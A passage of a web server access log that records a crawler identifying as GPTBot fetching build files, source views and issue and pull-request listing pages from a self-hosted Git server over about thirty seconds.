"/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/GoldMonitor/build/gold_monitor_full/EXE-00.toc" +[17/Feb/2026:18:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:27:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 10953] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PKG-00.toc" +[17/Feb/2026:18:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11061] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:28:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13366] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11063] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:28:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10954] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/GoldMonitor/build/gold_monitor_full/PYZ-00.toc" +[17/Feb/2026:18:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt?display=rendered" [Client 74.7.227.38] [Length 11020] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/CMakeCache.txt" +[17/Feb/2026:18:28:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake?display=source" [Client 74.7.227.38] [Length 13366] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/cmake_install.cmake" +[17/Feb/2026:18:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?milestone=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?milestone=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:28:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10183] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:28:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/i18n.js?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/assets/js/i18n.js" +[17/Feb/2026:18:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:28:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10187] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" +[17/Feb/2026:18:28:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10198] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:18:28:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:28:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:18:28:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10186] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:28:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10020] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:28:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.57] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10199] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10197] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10188] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10201] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:28:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10194] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10021] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10019] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=%28any%29&labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" +[17/Feb/2026:18:28:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10015] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10202] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10184] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" +[17/Feb/2026:18:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 10030] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=leastcomment&state=all&type=all" [Client 74.7.227.38] [Length 10195] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10018] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10193] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=recentupdate&state=all&type=all" [Client 74.7.227.38] [Length 10024] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 10023] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:18:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10026] [Gzip 3.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" +[17/Feb/2026:18:28:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr 